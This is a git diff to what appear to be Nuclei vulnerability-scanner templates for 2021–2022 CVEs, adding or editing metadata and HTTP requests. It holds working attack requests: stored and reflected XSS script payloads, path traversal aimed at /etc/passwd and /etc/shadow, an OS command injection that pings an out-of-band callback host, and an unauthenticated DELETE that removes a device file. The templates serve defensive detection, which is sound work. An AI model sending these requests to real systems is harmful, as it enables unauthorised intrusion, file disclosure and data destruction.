diff --git a/cves/2021/CVE-2021-46005.yaml b/cves/2021/CVE-2021-46005.yaml
index e11d1cdd8c..d8e3340bc8 100644
--- a/cves/2021/CVE-2021-46005.yaml
+++ b/cves/2021/CVE-2021-46005.yaml
@@ -8,12 +8,13 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/49546
     - https://nvd.nist.gov/vuln/detail/CVE-2021-46005
+    - https://www.sourcecodester.com/cc/14145/online-car-rental-system-using-phpmysql.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 5.4
     cve-id: CVE-2021-46005
     cwe-id: CWE-79
-  tags: cve,cve2021,xss,sourcecodester,authenticated
+  tags: sourcecodester,authenticated,edb,cve,cve2021,xss
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-46068.yaml b/cves/2021/CVE-2021-46068.yaml
new file mode 100644
index 0000000000..76cdfea5d2
--- /dev/null
+++ b/cves/2021/CVE-2021-46068.yaml
@@ -0,0 +1,55 @@
+id: CVE-2021-46068
+
+info:
+  name: Vehicle Service Management System - Stored Cross-Site Scripting
+  author: TenBird
+  severity: medium
+  description: |
+    A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel.
+  reference:
+    - https://github.com/plsanu/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS
+    - https://www.plsanu.com/vehicle-service-management-system-myaccount-stored-cross-site-scripting-xss
+    - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-46068
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 4.8
+    cve-id: CVE-2021-46068
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2021,xss,vms,authenticated
+requests:
+  - raw:
+      - |
+        POST /classes/Login.php?f=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /classes/Users.php?f=save HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        id=1&firstname=Administrator%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=Admin&username=admin
+
+      - |
+        GET /admin/?page=user HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(all_headers_3, 'text/html')"
+          - "status_code_3 == 200"
+          - 'contains(body_3, "Administrator\"><script>alert(document.domain)</script> Admin")'
+        condition: and
+
+# Enhanced by md on 2022/09/08
diff --git a/cves/2021/CVE-2021-46069.yaml b/cves/2021/CVE-2021-46069.yaml
new file mode 100644
index 0000000000..bd4e388996
--- /dev/null
+++ b/cves/2021/CVE-2021-46069.yaml
@@ -0,0 +1,56 @@
+id: CVE-2021-46069
+
+info:
+  name: Vehicle Service Management System 1.0 - Stored Cross Site Scripting
+  author: TenBird
+  severity: medium
+  description: |
+    Vehicle Service Management System 1.0 contains a stored cross-site scripting vulnerability via the Mechanic List section in login panel.
+  reference:
+    - https://github.com/plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS
+    - https://www.plsanu.com/vehicle-service-management-system-mechanic-list-stored-cross-site-scripting-xss
+    - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-46069
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 4.8
+    cve-id: CVE-2021-46069
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2021,xss,vms,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /classes/Login.php?f=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /classes/Master.php?f=save_mechanic HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        id=&name=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&contact=asd1&email=asd1@asd.com&status=1
+
+      - |
+        GET /admin/?page=mechanics HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(all_headers_3, 'text/html')"
+          - "status_code_3 == 200"
+          - 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
+        condition: and
+
+# Enhanced by mp 09/09/2022
diff --git a/cves/2021/CVE-2021-46071.yaml b/cves/2021/CVE-2021-46071.yaml
new file mode 100644
index 0000000000..3ba0b6090a
--- /dev/null
+++ b/cves/2021/CVE-2021-46071.yaml
@@ -0,0 +1,56 @@
+id: CVE-2021-46071
+
+info:
+  name: ehicle Service Management System 1.0 - Cross-Site Scripting
+  author: TenBird
+  severity: medium
+  description: |
+    Vehicle Service Management System 1.0 contains a stored cross-site scripting vulnerability via the Category List section in login panel.
+  reference:
+    - https://github.com/plsanu/Vehicle-Service-Management-System-Category-List-Stored-Cross-Site-Scripting-XSS
+    - https://www.plsanu.com/vehicle-service-management-system-category-list-stored-cross-site-scripting-xss
+    - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-46071
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 4.8
+    cve-id: CVE-2021-46071
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2021,xss,vms,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /classes/Login.php?f=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /classes/Master.php?f=save_category HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        id=&category=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&status=1
+
+      - |
+        GET /admin/?page=maintenance/category HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(all_headers_3, 'text/html')"
+          - "status_code_3 == 200"
+          - 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
+        condition: and
+
+# Enhanced by md on 2022/09/08
diff --git a/cves/2021/CVE-2021-46072.yaml b/cves/2021/CVE-2021-46072.yaml
new file mode 100644
index 0000000000..ec7d7871dd
--- /dev/null
+++ b/cves/2021/CVE-2021-46072.yaml
@@ -0,0 +1,55 @@
+id: CVE-2021-46072
+
+info:
+  name: Vehicle Service Management System 1.0 - Stored Cross Site Scripting
+  author: TenBird
+  severity: medium
+  description: |
+    Vehicle Service Management System 1.0 contains a stored cross-site scripting vulnerability via the Service List section in login panel.
+  reference:
+    - https://github.com/plsanu/Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS
+    - https://www.plsanu.com/vehicle-service-management-system-service-list-stored-cross-site-scripting-xss
+    - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-46072
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 4.8
+    cve-id: CVE-2021-46072
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2021,xss,vms,authenticated
+requests:
+  - raw:
+      - |
+        POST /classes/Login.php?f=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /classes/Master.php?f=save_service HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        id=&service=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&description=%3cp%3e%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e%3cbr%3e%3c%2fp%3e&status=1
+
+      - |
+        GET /admin/?page=maintenance/services HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(all_headers_3, 'text/html')"
+          - "status_code_3 == 200"
+          - 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
+        condition: and
+
+# Enhanced by md on 2022/09/08
diff --git a/cves/2021/CVE-2021-46073.yaml b/cves/2021/CVE-2021-46073.yaml
new file mode 100644
index 0000000000..746a1bd440
--- /dev/null
+++ b/cves/2021/CVE-2021-46073.yaml
@@ -0,0 +1,56 @@
+id: CVE-2021-46073
+
+info:
+  name: Vehicle Service Management System 1.0 - Cross Site Scripting
+  author: TenBird
+  severity: medium
+  description: |
+    Vehicle Service Management System 1.0 contains a cross-site scripting vulnerability via the User List section in login panel.
+  reference:
+    - https://github.com/plsanu/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS
+    - https://www.plsanu.com/vehicle-service-management-system-user-list-stored-cross-site-scripting-xss
+    - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-46073
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 4.8
+    cve-id: CVE-2021-46073
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2021,xss,vms,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /vehicle_service/classes/Users.php?f=save HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        firstname=test1%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=test&username=test&password=test&type=1
+
+      - |
+        GET /vehicle_service/admin/?page=user/list HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(all_headers_3, 'text/html')"
+          - "status_code_3 == 200"
+          - 'contains(body_3, "<script>alert(document.domain)</script> Test</td>")'
+        condition: and
+
+# Enhanced by mp 09/09/2022
diff --git a/cves/2021/CVE-2021-46379.yaml b/cves/2021/CVE-2021-46379.yaml
new file mode 100644
index 0000000000..270692bd08
--- /dev/null
+++ b/cves/2021/CVE-2021-46379.yaml
@@ -0,0 +1,33 @@
+id: CVE-2021-46379
+
+info:
+  name: D-Link DIR850 ET850-1.08TRb03 - Open Redirect
+  author: 0x_Akoko
+  severity: medium
+  description: DLink DIR850 ET850-1.08TRb03 contains incorrect access control vulnerability in URL redirection, which can be used to mislead users to go to untrusted sites.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-46379
+    - https://drive.google.com/file/d/1rrlwnIxSHEoO4SMAHRPKZSRzK5MwZQRf/view
+    - https://www.dlink.com/en/security-bulletin
+    - https://www.dlink.com/en/security-bulletin/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2021-46379
+    cwe-id: CWE-601
+  metadata:
+    verified: "true"
+  tags: cve,cve2021,redirect,dlink,router
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1'
+
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+
+# Enhanced by cs 06/22/2022
diff --git a/cves/2021/CVE-2021-46381.yaml b/cves/2021/CVE-2021-46381.yaml
index 33770bee9e..55202c7843 100644
--- a/cves/2021/CVE-2021-46381.yaml
+++ b/cves/2021/CVE-2021-46381.yaml
@@ -4,16 +4,17 @@ info:
   name: D-Link DAP-1620 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: Local File Inclusion due to path traversal in D-Link DAP-1620 leads to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].
+  description: D-Link DAP-1620 is susceptible to local file Inclusion due to path traversal that can  lead to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].
   reference:
     - https://drive.google.com/drive/folders/19OP09msw8l7CJ622nkvnvnt7EKun1eCG?usp=sharing
-    - https://www.cvedetails.com/cve/CVE-2021-46381/
+    - https://www.dlink.com/en/security-bulletin/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-46381
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2021-46381
     cwe-id: CWE-22
-  tags: cve,cve2021,dlink,lfi
+  tags: cve,cve2021,dlink,lfi,router
 
 requests:
   - method: POST
@@ -27,3 +28,5 @@ requests:
         part: body
         regex:
           - "root:.*:0:0:"
+
+# Enhanced by mp on 2022/06/29
diff --git a/cves/2021/CVE-2021-46387.yaml b/cves/2021/CVE-2021-46387.yaml
index 487925482d..a3ef370c63 100644
--- a/cves/2021/CVE-2021-46387.yaml
+++ b/cves/2021/CVE-2021-46387.yaml
@@ -4,10 +4,11 @@ info:
   name: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting
   author: DhiyaneshDk
   severity: medium
-  description: ZyXEL ZyWALL 2 Plus Internet Security Appliance is affected by Cross Site Scripting (XSS). Insecure URI handling leads to bypass security restriction to achieve Cross Site Scripting, which allows an
-    attacker able to execute arbitrary JavaScript codes to perform multiple attacks such as clipboard hijacking and session hijacking.
+  description: ZyXEL ZyWALL 2 Plus Internet Security Appliance contains a cross-site scripting vulnerability. Insecure URI handling leads to bypass of security restrictions, which allows an attacker to execute arbitrary JavaScript codes to perform multiple attacks.
   reference:
     - https://www.exploit-db.com/exploits/50797
+    - https://www.zyxel.com/us/en/support/security_advisories.shtml
+    - https://drive.google.com/drive/folders/1_XfWBLqxT2Mqt7uB663Sjlc62pE8-rcN?usp=sharing
     - https://nvd.nist.gov/vuln/detail/CVE-2021-46387
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -16,7 +17,7 @@ info:
     cwe-id: CWE-79
   metadata:
     shodan-query: http.title:"Zywall2Plus"
-  tags: cve,cve2021,xss,zyxel
+  tags: cve,cve2021,xss,zyxel,edb
 
 requests:
   - method: GET
@@ -40,3 +41,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-46417.yaml b/cves/2021/CVE-2021-46417.yaml
index ed53a93867..ce8b9dd70f 100644
--- a/cves/2021/CVE-2021-46417.yaml
+++ b/cves/2021/CVE-2021-46417.yaml
@@ -1,20 +1,25 @@
 id: CVE-2021-46417
 
 info:
-  name: Franklin Fueling Systems Colibri Controller Module - Local File Inclusion
+  name: Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion
   author: For3stCo1d
   severity: high
+  description: |
+    Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 is susceptible to local file inclusion because of insecure handling of a download function that leads to disclosure of internal files due to path traversal with root privileges.
   reference:
     - https://packetstormsecurity.com/files/166671/Franklin-Fueling-Systems-Colibri-Controller-Module-1.8.19.8580-Local-File-Inclusion.html
+    - https://drive.google.com/drive/folders/1Yu4aVDdrgvs-F9jP3R8Cw7qo_TC7VB-R
+    - http://packetstormsecurity.com/files/166610/FFS-Colibri-Controller-Module-1.8.19.8580-Directory-Traversal.html
     - https://nvd.nist.gov/vuln/detail/CVE-2021-46417
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2021-46417
     cwe-id: CWE-22
   metadata:
     shodan-query: http.html:"Franklin Fueling Systems"
-  tags: cve,cve2021,franklinfueling,lfi
+    verified: "true"
+  tags: packetstorm,cve,cve2021,franklinfueling,lfi
 
 requests:
   - method: GET
@@ -26,3 +31,5 @@ requests:
         part: body
         regex:
           - "root:.*:0:0:"
+
+# Enhanced by mp on 2022/06/29
diff --git a/cves/2021/CVE-2021-46422.yaml b/cves/2021/CVE-2021-46422.yaml
new file mode 100644
index 0000000000..462fb8ba10
--- /dev/null
+++ b/cves/2021/CVE-2021-46422.yaml
@@ -0,0 +1,45 @@
+id: CVE-2021-46422
+
+info:
+  name: SDT-CW3B1 1.1.0 - OS Command Injection
+  author: badboycxcc,prajiteshsingh
+  severity: critical
+  description: |
+    Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.
+  reference:
+    - https://www.exploit-db.com/exploits/50936
+    - https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-46422
+    - https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?usp=sharing
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-46422
+    cwe-id: CWE-78
+  metadata:
+    shodan-query: html:"SDT-CW3B1"
+    verified: "true"
+  tags: cve,cve2021,telesquare,rce,router,injection,edb
+
+variables:
+  cmd: "ping${IFS}-c${IFS}1${IFS}{{interactsh-url}}"
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<CmdResult>"
+
+      - type: word
+        part: interactsh_protocol
+        name: http
+        words:
+          - "dns"
+
+# Enhanced by mp on 2022/05/18
diff --git a/cves/2021/CVE-2021-46424.yaml b/cves/2021/CVE-2021-46424.yaml
new file mode 100644
index 0000000000..2b6d737b8a
--- /dev/null
+++ b/cves/2021/CVE-2021-46424.yaml
@@ -0,0 +1,44 @@
+id: CVE-2021-46424
+
+info:
+  name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete
+  author: gy741
+  severity: critical
+  description: Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request.
+  reference:
+    - https://dl.packetstormsecurity.net/2205-exploits/tlr2005ksh-filedelete.txt
+    - https://drive.google.com/drive/folders/1_e3eJ8fzhCWnCkoRpbLoyQecuKkPR4OD?usp=sharing
+    - http://packetstormsecurity.com/files/167127/TLR-2005KSH-Arbitrary-File-Delete.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-46424
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
+    cvss-score: 9.1
+    cve-id: CVE-2021-46424
+    cwe-id: CWE-306
+  metadata:
+    shodan-query: http.html:"TLR-2005KSH"
+    verified: "true"
+  tags: cve,cve2021,telesquare,intrusive,packetstorm
+
+requests:
+  - raw:
+      - |
+        GET /images/icons_title.gif HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        DELETE /images/icons_title.gif HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /images/icons_title.gif HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_1 == 200 && status_code_2 == 204 && status_code_3 == 404"
+
+# Enhanced by mp on 2022/05/18
diff --git a/cves/2022/CVE-2022-0140.yaml b/cves/2022/CVE-2022-0140.yaml
index 211da761a0..cc4682ea12 100644
--- a/cves/2022/CVE-2022-0140.yaml
+++ b/cves/2022/CVE-2022-0140.yaml
@@ -1,19 +1,21 @@
 id: CVE-2022-0140
 
 info:
-  name: WordPress Visual Form Builder < 3.0.6 - Unauthenticated Information Disclosure
+  name: WordPress Visual Form Builder <3.0.8 - Cross-Site Scripting
   author: random-robbie
   severity: medium
   description: |
-    Visual Form Builder < 3.0.6 - Unauthenticated Information Disclosure. The plugin does not perform access control on entry form export, allowing unauthenticated users to see the form entries or export it as a CSV File using the vfb-export endpoint.
+    WordPress Visual Form Builder plugin before 3.0.8 contains a cross-site scripting vulnerability. The plugin does not perform access control on entry form export, allowing an unauthenticated user to export the form entries as CSV files using the vfb-export endpoint.
   reference:
     - https://wpscan.com/vulnerability/9fa2b3b6-2fe3-40f0-8f71-371dd58fe336
-  tags: cve,cve2022,xss,wordpress
+    - https://www.fortiguard.com/zeroday/FG-VD-21-082
+    - https://nvd.nist.gov/vuln/detail/cve-2022-0140
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
-    cvss-score: 5.30
+    cvss-score: 5.3
     cve-id: CVE-2022-0140
     cwe-id: CWE-200
+  tags: wpscan,cve,cve2022,xss,wordpress
 
 requests:
   - raw:
@@ -36,4 +38,6 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2022/CVE-2022-0148.yaml b/cves/2022/CVE-2022-0148.yaml
index 264fe135a8..b2d6dd34ba 100644
--- a/cves/2022/CVE-2022-0148.yaml
+++ b/cves/2022/CVE-2022-0148.yaml
@@ -1,19 +1,21 @@
 id: CVE-2022-0148
 
 info:
-  name: All-in-one Floating Contact Form < 2.0.4 - Authenticated Reflected XSS
+  name: WordPress All-in-one Floating Contact Form <2.0.4 - Cross-Site Scripting
   author: DhiyaneshDK
   severity: medium
-  description: The plugin was vulnerable to reflected XSS on the my-sticky-elements-leads admin page.
+  description: WordPress All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs plugin before 2.0.4 contains a reflected cross-site scripting vulnerability on the my-sticky-elements-leads admin page.
   reference:
     - https://wpscan.com/vulnerability/37665ee1-c57f-4445-9596-df4f7d72c8cd
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0148
+    - https://plugins.trac.wordpress.org/changeset/2654453/mystickyelements
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0148
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 5.4
     cve-id: CVE-2022-0148
     cwe-id: CWE-79
-  tags: cve,cve2022,wordpress,xss,wp-plugin,authenticated
+  tags: xss,wp-plugin,authenticated,wpscan,cve,cve2022,wordpress
 
 requests:
   - raw:
@@ -46,3 +48,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2022/CVE-2022-0149.yaml b/cves/2022/CVE-2022-0149.yaml
index 249bba99f2..edb49b7787 100644
--- a/cves/2022/CVE-2022-0149.yaml
+++ b/cves/2022/CVE-2022-0149.yaml
@@ -1,19 +1,20 @@
 id: CVE-2022-0149
 
 info:
-  name: WooCommerce Stored Exporter WordPress Plugin < 2.7.1 - Reflected Cross-Site Scripting
+  name: WooCommerce Stored Exporter WordPress Plugin < 2.7.1 - Cross-Site Scripting
   author: dhiyaneshDk
   severity: medium
   description: The plugin was affected by a reflected cross-site scripting vulnerability in the woo_ce admin page.
   reference:
     - https://wpscan.com/vulnerability/e47c288a-2ea3-4926-93cc-113867cbc77c
     - https://nvd.nist.gov/vuln/detail/CVE-2022-0149
+    - https://plugins.trac.wordpress.org/changeset/2654545/woocommerce-exporter
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2022-0149
     cwe-id: CWE-79
-  tags: cve,cve2022,wordpress,wp-plugin,xss,woocommerce,authenticated
+  tags: wpscan,cve,cve2022,wordpress,wp-plugin,xss,woocommerce,authenticated
 
 requests:
   - raw:
diff --git a/cves/2022/CVE-2022-0150.yaml b/cves/2022/CVE-2022-0150.yaml
new file mode 100644
index 0000000000..cdaaed7f6d
--- /dev/null
+++ b/cves/2022/CVE-2022-0150.yaml
@@ -0,0 +1,40 @@
+id: CVE-2022-0150
+
+info:
+  name: WordPress Accessibility Helper <0.6.0.7 - Cross-Site Scripting
+  author: dhiyaneshDK
+  severity: medium
+  description: |
+    WordPress Accessibility Helper plugin before 0.6.0.7 contains a cross-site scripting vulnerability. It does not sanitize and escape the wahi parameter before outputting back its base64 decode value in the page.
+  reference:
+    - https://wpscan.com/vulnerability/7142a538-7c3d-4dd0-bd2c-cbd2efaf53c5
+    - https://plugins.trac.wordpress.org/changeset/2661008
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-0150
+    cwe-id: CWE-79
+  tags: wordpress,wp-plugin,wp,wpscan,cve,cve2022,xss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "var wah_target_src = '';alert(document.domain);//';"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by md on 2022/09/08
diff --git a/cves/2022/CVE-2022-0165.yaml b/cves/2022/CVE-2022-0165.yaml
index 6819d8dae4..9c67da252a 100644
--- a/cves/2022/CVE-2022-0165.yaml
+++ b/cves/2022/CVE-2022-0165.yaml
@@ -1,26 +1,29 @@
 id: CVE-2022-0165
 
 info:
-  name: WordPress Page Builder KingComposer <= 2.9.6 - Open Redirect
+  name: WordPress Page Builder KingComposer <=2.9.6 - Open Redirect
   author: akincibor
   severity: high
-  description: The plugin does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action available to both unauthenticated and authenticated users.
+  description: WordPress Page Builder KingComposer 2.9.6 and prior does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action (which is available to both unauthenticated and authenticated users).
   reference:
     - https://wpscan.com/vulnerability/906d0c31-370e-46b4-af1f-e52fbddd00cb
-  tags: cve,cve2022,wp-plugin,redirect,wordpress
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0165
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
     cvss-score: 8.80
     cve-id: CVE-2022-0165
     cwe-id: CWE-601
+  tags: cve,cve2022,wp-plugin,redirect,wordpress,wp,wpscan
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://example.com"
+      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh"
 
     matchers:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
\ No newline at end of file
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
+
+# Enhanced by mp on 2022/06/29
diff --git a/cves/2022/CVE-2022-0189.yaml b/cves/2022/CVE-2022-0189.yaml
index b7bc8e2abf..bdf0f4db66 100644
--- a/cves/2022/CVE-2022-0189.yaml
+++ b/cves/2022/CVE-2022-0189.yaml
@@ -1,20 +1,20 @@
 id: CVE-2022-0189
 
 info:
-  name: WordPress RSS Aggregator < 4.20 - Authenticated Reflected Cross-Site Scripting
+  name: WordPress RSS Aggregator < 4.20 - Authenticated Cross-Site Scripting
   author: DhiyaneshDK
   severity: medium
-  description: WordPress RSS Aggregator < 4.20 is susceptible to cross-site scripting. The plugin does not sanitize and escape the id parameter in the wprss_fetch_items_row_action AJAX action before outputting it
-    back in the response, leading to reflected cross-site scripting.
+  description: WordPress RSS Aggregator < 4.20 is susceptible to cross-site scripting. The plugin does not sanitize and escape the id parameter in the wprss_fetch_items_row_action AJAX action before outputting it back in the response, leading to reflected cross-site scripting.
   reference:
     - https://wpscan.com/vulnerability/52a71bf1-b8bc-479e-b741-eb8fb9685014
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0189
+    - https://plugins.trac.wordpress.org/changeset/2659298
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2022-0189
     cwe-id: CWE-79
-  tags: cve,cve2022,wordpress,xss,wp-plugin,authenticated
+  tags: wpscan,cve,cve2022,wordpress,xss,wp-plugin,authenticated
 
 requests:
